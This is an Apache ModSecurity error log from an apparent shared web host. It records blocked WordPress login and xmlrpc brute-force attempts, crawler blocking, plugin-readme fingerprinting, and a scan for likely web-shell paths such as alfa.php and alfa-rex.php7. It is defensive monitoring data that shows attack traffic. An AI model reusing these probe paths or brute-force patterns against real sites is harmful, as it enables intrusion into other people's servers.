[Tue May 26 16:11:11.606291 2026] [security2:error] [pid 773493:tid 773676] [client 103.44.52.196:36174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4x5gy-Vk4jSdqTCRRQwAAALo"]
[Tue May 26 16:11:11.606446 2026] [security2:error] [pid 773493:tid 773676] [client 103.44.52.196:36174] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4x5gy-Vk4jSdqTCRRQwAAALo"]
[Tue May 26 16:11:12.162146 2026] [security2:error] [pid 773493:tid 773737] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4x5gy-Vk4jSdqTCRRSQAAAPc"]
[Tue May 26 16:11:13.285914 2026] [security2:error] [pid 773493:tid 773691] [client 31.57.184.20:51623] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahV4yZgy-Vk4jSdqTCRRagAAAMk"], referer: https://www.google.com/
[Tue May 26 16:11:13.648194 2026] [security2:error] [pid 773493:tid 773736] [client 31.57.184.20:52004] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahV4yZgy-Vk4jSdqTCRRdAAAAPY"]
[Tue May 26 16:11:14.190827 2026] [security2:error] [pid 773493:tid 773742] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4yZgy-Vk4jSdqTCRRdwAAAPw"]
[Tue May 26 16:11:14.664811 2026] [security2:error] [pid 773493:tid 773683] [client 31.57.184.20:52194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahV4ypgy-Vk4jSdqTCRRjQAAAME"]
[Tue May 26 16:11:16.189702 2026] [security2:error] [pid 773493:tid 773749] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4y5gy-Vk4jSdqTCRRpgAAAQM"]
[Tue May 26 16:11:17.544205 2026] [security2:error] [pid 773493:tid 773690] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4zZgy-Vk4jSdqTCRRwAAAAMg"]
[Tue May 26 16:11:19.141162 2026] [security2:error] [pid 773493:tid 773736] [client 106.219.85.83:16921] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4z5gy-Vk4jSdqTCRR6gAAAPY"]
[Tue May 26 16:11:19.141354 2026] [security2:error] [pid 773493:tid 773736] [client 106.219.85.83:16921] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4z5gy-Vk4jSdqTCRR6gAAAPY"]
[Tue May 26 16:11:19.679516 2026] [security2:error] [pid 773493:tid 773686] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4z5gy-Vk4jSdqTCRR8AAAAMQ"]
[Tue May 26 16:11:19.835988 2026] [security2:error] [pid 773493:tid 773733] [client 74.7.230.27:45484] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "kmmc.co.in"] [uri "/cgi-sys/404.html"] [unique_id "ahV4z5gy-Vk4jSdqTCRR_gAA80g"]
[Tue May 26 16:11:19.977419 2026] [autoindex:error] [pid 773493:tid 773596] [remote 74.7.227.163:53122] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:11:20.221562 2026] [security2:error] [pid 773493:tid 773655] [client 123.20.149.157:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4z5gy-Vk4jSdqTCRR_AAAAKU"]
[Tue May 26 16:11:20.257192 2026] [security2:error] [pid 773493:tid 773635] [client 20.196.127.68:17474] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahV40Jgy-Vk4jSdqTCRSBgAAAJE"]
[Tue May 26 16:11:20.314743 2026] [security2:error] [pid 773493:tid 773635] [client 20.196.127.68:17474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahV40Jgy-Vk4jSdqTCRSBgAAAJE"]
[Tue May 26 16:11:20.871846 2026] [security2:error] [pid 773493:tid 773678] [client 85.208.96.211:61156] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-27th/list/"] [unique_id "ahV40Jgy-Vk4jSdqTCRSDwAAALw"]
[Tue May 26 16:11:20.872000 2026] [security2:error] [pid 773493:tid 773678] [client 85.208.96.211:61156] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-27th/list/"] [unique_id "ahV40Jgy-Vk4jSdqTCRSDwAAALw"]
[Tue May 26 16:11:20.923716 2026] [security2:error] [pid 773493:tid 773750] [client 20.196.127.68:13659] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/2.php"] [unique_id "ahV40Jgy-Vk4jSdqTCRSEAAAAQQ"]
[Tue May 26 16:11:21.520986 2026] [security2:error] [pid 773493:tid 773634] [client 20.196.127.68:13679] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/7.php"] [unique_id "ahV40Zgy-Vk4jSdqTCRSFwAAAJA"]
[Tue May 26 16:11:21.876743 2026] [security2:error] [pid 773493:tid 773709] [client 103.44.52.196:57966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV40Zgy-Vk4jSdqTCRSHgAAANs"]
[Tue May 26 16:11:21.877546 2026] [security2:error] [pid 773493:tid 773709] [client 103.44.52.196:57966] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV40Zgy-Vk4jSdqTCRSHgAAANs"]
[Tue May 26 16:11:22.120085 2026] [security2:error] [pid 773493:tid 773669] [client 20.196.127.68:13329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/10.php"] [unique_id "ahV40pgy-Vk4jSdqTCRSJQAAALM"]
[Tue May 26 16:11:22.334846 2026] [security2:error] [pid 773493:tid 773629] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV40Zgy-Vk4jSdqTCRSIQAAAIs"]
[Tue May 26 16:11:22.700570 2026] [security2:error] [pid 773493:tid 773718] [client 20.196.127.68:13455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/13.php"] [unique_id "ahV40pgy-Vk4jSdqTCRSLwAAAOQ"]
[Tue May 26 16:11:22.742963 2026] [security2:error] [pid 773493:tid 773603] [remote 57.141.2.3:29556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/archive.php"] [unique_id "ahV40pgy-Vk4jSdqTCRSMwAA7G0"]
[Tue May 26 16:11:23.335578 2026] [security2:error] [pid 773493:tid 773656] [client 20.196.127.68:13449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/100.php"] [unique_id "ahV405gy-Vk4jSdqTCRSSgAAAKY"]
[Tue May 26 16:11:23.943753 2026] [security2:error] [pid 773493:tid 773643] [client 20.196.127.68:13464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahV405gy-Vk4jSdqTCRSYgAAAJk"]
[Tue May 26 16:11:24.154839 2026] [security2:error] [pid 773493:tid 773748] [client 82.41.255.9:10177] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "canopykaapi.com"] [uri "/wp-content/plugins/woocommerce-payments/readme.txt"] [unique_id "ahV41Jgy-Vk4jSdqTCRScAAAAQI"]
[Tue May 26 16:11:24.394709 2026] [security2:error] [pid 773493:tid 773735] [client 82.41.255.9:41679] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "canopykaapi.com"] [uri "/wp-content/plugins/jetpack/readme.txt"] [unique_id "ahV41Jgy-Vk4jSdqTCRSdwAAAPU"]
[Tue May 26 16:11:24.486026 2026] [security2:error] [pid 773493:tid 773671] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV41Jgy-Vk4jSdqTCRSaQAAALU"]
[Tue May 26 16:11:24.547747 2026] [security2:error] [pid 773493:tid 773640] [client 20.196.127.68:16904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahV41Jgy-Vk4jSdqTCRSewAAAJY"]
[Tue May 26 16:11:24.766910 2026] [security2:error] [pid 773493:tid 773724] [client 82.41.255.9:21719] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "canopykaapi.com"] [uri "/wp-content/plugins/woo-variation-swatches/readme.txt"] [unique_id "ahV41Jgy-Vk4jSdqTCRShQAAAOo"]
[Tue May 26 16:11:24.985017 2026] [security2:error] [pid 773493:tid 773695] [client 82.41.255.9:12047] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "canopykaapi.com"] [uri "/wp-content/plugins/rocket-lazy-load/readme.txt"] [unique_id "ahV41Jgy-Vk4jSdqTCRSigAAAM0"]
[Tue May 26 16:11:25.128545 2026] [security2:error] [pid 773493:tid 773691] [client 20.196.127.68:2483] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/abcd.php"] [unique_id "ahV41Zgy-Vk4jSdqTCRSiwAAAMk"]
[Tue May 26 16:11:25.753028 2026] [security2:error] [pid 773493:tid 773719] [client 20.196.127.68:13463] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/al.php"] [unique_id "ahV41Zgy-Vk4jSdqTCRSogAAAOU"]
[Tue May 26 16:11:25.817363 2026] [security2:error] [pid 773493:tid 773706] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV41Zgy-Vk4jSdqTCRSlAAAANg"]
[Tue May 26 16:11:26.150182 2026] [security2:error] [pid 773493:tid 773749] [client 170.23.29.209:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahV41Zgy-Vk4jSdqTCRSnAAAAQM"]
[Tue May 26 16:11:26.207328 2026] [security2:error] [pid 773493:tid 773518] [remote 20.219.17.202:60590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.17.219.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahV41pgy-Vk4jSdqTCRSpwAA5Bg"]
[Tue May 26 16:11:26.333865 2026] [security2:error] [pid 773493:tid 773652] [client 20.196.127.68:16923] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/alfa.php"] [unique_id "ahV41pgy-Vk4jSdqTCRSsAAAAKI"]
[Tue May 26 16:11:26.940713 2026] [core:crit] [pid 773493:tid 773700] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:11:26.953589 2026] [security2:error] [pid 773493:tid 773633] [client 20.196.127.68:13326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/as.php"] [unique_id "ahV41pgy-Vk4jSdqTCRSuwAAAI8"]
[Tue May 26 16:11:27.574252 2026] [security2:error] [pid 773493:tid 773680] [client 20.196.127.68:16897] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahV415gy-Vk4jSdqTCRSxQAAAL4"]
[Tue May 26 16:11:28.192513 2026] [security2:error] [pid 773493:tid 773712] [client 20.196.127.68:13685] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/abc.php"] [unique_id "ahV42Jgy-Vk4jSdqTCRS1wAAAN4"]
[Tue May 26 16:11:28.307075 2026] [security2:error] [pid 773493:tid 773739] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV415gy-Vk4jSdqTCRS0gAAAPk"]
[Tue May 26 16:11:28.844283 2026] [security2:error] [pid 773493:tid 773748] [client 20.196.127.68:17533] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahV42Jgy-Vk4jSdqTCRS6QAAAQI"]
[Tue May 26 16:11:29.427573 2026] [security2:error] [pid 773493:tid 773654] [client 20.196.127.68:16156] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/autoload_classmap.php"] [unique_id "ahV42Zgy-Vk4jSdqTCRS-AAAAKQ"]
[Tue May 26 16:11:29.664056 2026] [security2:error] [pid 773493:tid 773684] [client 106.219.85.83:15829] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV42Zgy-Vk4jSdqTCRS_AAAAMI"]
[Tue May 26 16:11:29.664180 2026] [security2:error] [pid 773493:tid 773684] [client 106.219.85.83:15829] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV42Zgy-Vk4jSdqTCRS_AAAAMI"]
[Tue May 26 16:11:30.064966 2026] [security2:error] [pid 773493:tid 773709] [client 20.196.127.68:16912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/asus.php"] [unique_id "ahV42pgy-Vk4jSdqTCRTBgAAANs"]
[Tue May 26 16:11:30.485192 2026] [security2:error] [pid 773493:tid 773667] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV42pgy-Vk4jSdqTCRTCQAAALE"]
[Tue May 26 16:11:30.675987 2026] [security2:error] [pid 773493:tid 773625] [client 20.196.127.68:16957] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahV42pgy-Vk4jSdqTCRTEAAAAIc"]
[Tue May 26 16:11:31.332030 2026] [security2:error] [pid 773493:tid 773721] [client 20.196.127.68:17508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/atomlib.php"] [unique_id "ahV425gy-Vk4jSdqTCRTGwAAAOc"]
[Tue May 26 16:11:31.930744 2026] [security2:error] [pid 773493:tid 773627] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV425gy-Vk4jSdqTCRTHwAAAIk"]
[Tue May 26 16:11:31.968858 2026] [security2:error] [pid 773493:tid 773647] [client 20.196.127.68:16919] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/alfa-rex.php7"] [unique_id "ahV425gy-Vk4jSdqTCRTJgAAAJ0"]
[Tue May 26 16:11:32.534047 2026] [security2:error] [pid 773493:tid 773711] [client 103.44.52.196:50592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV43Jgy-Vk4jSdqTCRTMQAAAN0"]
[Tue May 26 16:11:32.534156 2026] [security2:error] [pid 773493:tid 773711] [client 103.44.52.196:50592] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV43Jgy-Vk4jSdqTCRTMQAAAN0"]
[Tue May 26 16:11:32.584167 2026] [security2:error] [pid 773493:tid 773693] [client 20.196.127.68:13496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/b.php"] [unique_id "ahV43Jgy-Vk4jSdqTCRTNAAAAMs"]
[Tue May 26 16:11:33.171349 2026] [security2:error] [pid 773493:tid 773714] [client 20.196.127.68:13648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/buy.php"] [unique_id "ahV43Zgy-Vk4jSdqTCRTPgAAAOA"]
[Tue May 26 16:11:33.808752 2026] [security2:error] [pid 773493:tid 773713] [client 20.196.127.68:17503] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/bless.php"] [unique_id "ahV43Zgy-Vk4jSdqTCRTTQAAAN8"]
